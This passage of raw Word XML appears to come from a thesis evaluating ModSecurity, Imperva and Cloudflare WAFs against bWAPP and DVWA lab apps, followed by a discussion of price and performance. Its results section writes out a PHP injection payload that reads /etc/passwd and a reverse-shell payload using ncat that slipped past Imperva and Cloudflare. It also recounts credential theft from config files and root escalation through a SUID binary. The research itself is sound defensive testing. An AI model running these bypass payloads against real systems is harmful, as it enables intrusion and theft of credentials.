        <w:t xml:space="preserve">PHP code injection was the second least blocked attack vector for all three WAFs. </w:t>
      </w:r>
      <w:r w:rsidR="00F400A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">One payload that was blocked by all three WAFs was </w:t>
      </w:r>
      <w:r w:rsidR="004E3DC9" w:rsidRPr="004E3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r w:rsidR="004E3DC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D195093" w14:textId="13FEB021" w:rsidR="00B762A4" w:rsidRDefault="00E52578" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">All three WAFs classified the payload as XSS attempt. ModSecurity’s rule ID 973307, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>"XSS Attack Detected"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> was triggered having matched the data </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0012493C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Imperva identified and blocked the payload based on the threat pattern</w:t>
      </w:r>
      <w:r w:rsidR="00C073D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C073D3" w:rsidRPr="00C073D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>message=test%3beval%28%29</w:t>
      </w:r>
      <w:r w:rsidR="00B762A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, it was classified as XSS. </w:t>
      </w:r>
      <w:r w:rsidR="00F454C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Similarly, Cloudflare identified the request as “</w:t>
      </w:r>
      <w:r w:rsidR="00F454C4" w:rsidRPr="00F454C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>XSS - JS Context Escape</w:t>
      </w:r>
      <w:r w:rsidR="00F454C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">” with rule ID 100174. The query string that triggered Cloudflare’s rule was </w:t>
      </w:r>
      <w:r w:rsidR="00F454C4" w:rsidRPr="00F454C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>?message=test;eval()</w:t>
      </w:r>
      <w:r w:rsidR="00F454C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812124C" w14:textId="722FEFC4" w:rsidR="00896C7C" w:rsidRDefault="004A2B4D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Through bWAPP’s PHP injection page, PHP codes were injected into the request for exploits. Using the payload system(), it was possible to execute OS commands. </w:t>
      </w:r>
      <w:r w:rsidR="004D12BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Through this method, database (DB) credentials were found in configuration files of the web applications, in </w:t>
      </w:r>
      <w:r w:rsidR="004D12BA" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/bWAPP/admin/settings.php and /DVWA/config/config.inc.php</w:t>
      </w:r>
      <w:r w:rsidR="004D12BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for bWAPP and DVWA respectively. </w:t>
      </w:r>
      <w:r w:rsidR="00896C7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>The credentials were then tested to log in to phpMyAdmin and were observed to be successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77CF05" w14:textId="7CAE99A4" w:rsidR="00A43436" w:rsidRPr="00DE6606" w:rsidRDefault="004D12BA" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Access to /etc/passwd was also made possible by combining two payloads</w:t>
      </w:r>
      <w:r w:rsidR="00507D06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, combining two attack vectors, PHP code injection and OS code injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the same request – </w:t>
      </w:r>
      <w:r w:rsidRPr="004D12BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chdir(/etc);system(cat passwd)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66760A" w14:textId="272B813C" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="005063C6" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using the same method, achieving reverse shell was also made possible. With some manual tweaks, the payload that was allowed by both Imperva and Cloudflare were found – </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chdir('/bin');system('ncat -e bash "172.31.30.146" 8080')</w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008B0A5F" w:rsidRPr="008B0A5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Although the reverse shell was achieved,</w:t>
      </w:r>
      <w:r w:rsidR="008B0A5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A77A2" w:rsidRPr="009A77A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">the user access achieved was apache. However, because the reverse shell was achieved from a machine within the same network, </w:t>
      </w:r>
      <w:r w:rsidR="00FD6531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">subsequent connections did not have to pass through the WAFs. As such, root access was able to be exploited </w:t>
      </w:r>
      <w:r w:rsidR="00FD6531" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>by gaining access to the terminal and exploiting the python folder with root’s SUID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF86F2" w14:textId="2CCAEA1A" w:rsidR="008733A7" w:rsidRPr="00DE6606" w:rsidRDefault="00742E3A" w:rsidP="00742E3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc71138508"/>
      <w:r>
        <w:t xml:space="preserve">4.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="008733A7" w:rsidRPr="00DE6606">
        <w:t>Broken authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="6E9B7474" w14:textId="66EA1311" w:rsidR="00793C59" w:rsidRDefault="000667E9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>All three WAFs allowed dictionary attack to be performed on the login pages of the web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA5B07" w14:textId="516A6552" w:rsidR="00855796" w:rsidRDefault="00855796" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Although dictionary attacks are not blocked by default, Imperva and Cloudflare allow rules to be crafted to block it easily. This can be done by crafting and implementing rate limiting rules. What it does when already implemented is that it will </w:t>
      </w:r>
      <w:r w:rsidR="00C400C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>count the number of times a certain IP access a certain page within the stipulated duration. If it hits the threshold set in the rule, the request would be blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDCB69" w14:textId="2A9A72FF" w:rsidR="006154BE" w:rsidRDefault="006154BE" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva has an additional security feature in place, which is called three-strikes rule. </w:t>
      </w:r>
      <w:r w:rsidR="00F71E35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When three similar requests within the same session that triggered a rule, the three-strikes rule would be triggered. When it is triggered, that client would be blocked for ten minutes. The client would only be unblocked after 10 minutes of </w:t>
      </w:r>
      <w:r w:rsidR="003720C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>inactivity</w:t>
      </w:r>
      <w:r w:rsidR="00F71E35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, which means that the block for 10 minutes would be retriggered indefinitely if there is a request made by the client within the 10 minutes window.</w:t>
      </w:r>
      <w:r w:rsidR="00BA606C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This feature was put in place to prevent zero-day attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D3012" w14:textId="4DD58A38" w:rsidR="00F71E35" w:rsidRPr="00DE6606" w:rsidRDefault="00DF7496" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ModSecurity could also be configured to block dictionary attacks but it is the least intuitive amongst the three WAFs. To do so, it needs the help of a script. Within the script,</w:t>
      </w:r>
      <w:r w:rsidR="00B75520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> login failure and success are detected by the returned status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D2399" w14:textId="77777777" w:rsidR="002B000A" w:rsidRPr="00DE6606" w:rsidRDefault="002B000A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A2B7A9" w14:textId="6D6C99B2" w:rsidR="00DF75C0" w:rsidRPr="00DE6606" w:rsidRDefault="00DF75C0" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8FF55" w14:textId="0AECF8D9" w:rsidR="00003CB7" w:rsidRPr="00DE6606" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc71138509"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidR="00003CB7" w:rsidRPr="00DE6606">
        <w:t>Discussion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="280778C6" w14:textId="37C48BA5" w:rsidR="00126E2D" w:rsidRPr="00126E2D" w:rsidRDefault="00126E2D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In this section, we will discuss the results presented in the previous section. Some recommendations would also be discussed and proposed. This section ends off with discussing the limitations of this thesis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213AA61B" w14:textId="0E3AD777" w:rsidR="00DF75C0" w:rsidRPr="00126E2D" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc71138510"/>
      <w:r>
        <w:t xml:space="preserve">5.1 </w:t>
      </w:r>
      <w:r w:rsidR="00126E2D" w:rsidRPr="00126E2D">
        <w:t>Price</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="04187C7B" w14:textId="3FF5CC21" w:rsidR="00126E2D" w:rsidRDefault="00126E2D" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">In the results section, </w:t>
      </w:r>
      <w:r w:rsidR="0002449F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>it was mentioned that ModSecurity was free, Imperva cost $59 for the Pro plan and Cloudflare was $20 for the Pro plan</w:t>
      </w:r>
      <w:r w:rsidR="00006709">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> per month</w:t>
      </w:r>
      <w:r w:rsidR="0002449F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. ModSecurity, being open-source, does not have any paid plans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A4F41D" w14:textId="61CA64E8" w:rsidR="00257B7F" w:rsidRDefault="00257B7F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Imperva previously had three plans, Pro, Business and Enterprise plans, costing $59, $299 and “Ask for Quote” respectively. The results section reflected the cost of the previous plan cost because the new plans do not have the costs listed on their website. The new plans now have four tiers instead. They are Essentials, Professional, Enterprise and 360. All of which, requires the consumer to contact the sales team. However, when comparing the features from the old plans to the new plans, the old Pro plan is closest to the new Essentials plan. As such, I would assume that the price should be similar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A99B1DA" w14:textId="5CDDB1AB" w:rsidR="00006709" w:rsidRDefault="00006709" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare has three plans, the Pro, Business and Enterprise plans, costing $20</w:t>
      </w:r>
      <w:r w:rsidR="00257B7F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, $200 and “Ask for Quote” respectively. With each upgraded plan, more features are made available, such as more custom rule sets, better support, bot management and analytics, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552F41F" w14:textId="76FAC29B" w:rsidR="00126E2D" w:rsidRPr="00213454" w:rsidRDefault="00391296" w:rsidP="00391296">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc71138511"/>
      <w:r>
        <w:t xml:space="preserve">5.2 </w:t>
      </w:r>
      <w:r w:rsidR="00126E2D" w:rsidRPr="00213454">
        <w:t>Performance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="154A26C8" w14:textId="77777777" w:rsidR="006D72E9" w:rsidRDefault="00213454" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The outcome of the performance test shared in the results section showed that the index page took the least time to load from the server with ModSecurity configured. However, this was because </w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>two</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the requests</w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> took twice as long to load as other requests to load from the server without WAF. One request,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> request 6</w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Singapore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">(raw results can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">found </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>in the Appendix)</w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the other request, request 7 from Washington DC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Should th</w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> request</w:t>
      </w:r>
      <w:r w:rsidR="001D1B12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> have taken similar duration as the other nine requests</w:t>
      </w:r>
      <w:r w:rsidR="00984F1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from respective countries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, the results would </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>have shown that the duration to load the index page from the server without WAF was the shortest.</w:t>
      </w:r>
      <w:r w:rsidR="006D72E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138B0E52" w14:textId="07B5F577" w:rsidR="00126E2D" w:rsidRDefault="006D72E9" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Another anomaly observed was from Imperva’s request 6 from Sydney, but the duration it took to load the index page was only about 1.5 times as much as the second longest duration of the other nine requests. Even if that request was to have had loaded the page with similar duration, it wouldn’t have affected the average much. As such, the sequence of the</w:t>
      </w:r>
      <w:r w:rsidR="00266767">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> total average</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> results would have been: without WAF, ModSecurity, Imperva followed by Cloudflare last.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96904C" w14:textId="33B2C817" w:rsidR="00AF5DB4" w:rsidRDefault="00AF5DB4" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In reality, however, consumers would take advantage of the use of CDN that comes with the cloud WAFs to not only save some costs but also improve performance. With cache enabled, claims have been made by reviews and companies that the performance could improve by about 1.5 times or better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E77C0F" w14:textId="49FC0B4C" w:rsidR="007379C7" w:rsidRDefault="007379C7" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51C48C" w14:textId="281F7209" w:rsidR="00D3294E" w:rsidRDefault="00D3294E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
